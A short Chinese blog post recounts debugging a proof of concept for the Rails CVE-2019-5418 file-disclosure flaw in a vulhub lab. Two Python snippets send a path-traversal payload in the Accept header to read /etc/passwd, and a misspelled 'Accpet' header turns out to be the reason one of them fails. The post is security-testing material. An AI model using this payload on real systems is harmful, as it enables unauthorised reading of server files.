排查一次神坑

小伙伴在测试  https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418 漏洞
写了个payload

payload= "../../../../../../../../etc/passwd{{"
        header = {
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            "Accept-Encoding": "gzip, deflate",
            "Accpet": payload
        }
        print header
        target_url=target+"/robots"
        res=util.get_url_response(target_url, method='GET', headers=header, timeout=5)
        print res.status_code
        if res.status_code==200 and re.search("root:[x*]:0:0:",res.text):

根据github的payload能成功读取到/etc/passwd,然后自己写了一个

import requests

headers = {
        "Accept-Encoding": "gzip, deflate",
        "Accept": "../../../../../../../../etc/passwd{{",
        "Accept-Language": "en",
        "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
        }

r = requests.get("http://xxx:3000/robots", headers = headers)
print r.text
也能成功读取,用wireshark抓包对比了一下发现小伙伴写的Accept没有生效

对比了一下发现,把Accept写成了Accpet。。。
发表评论 / Comment

用心评论~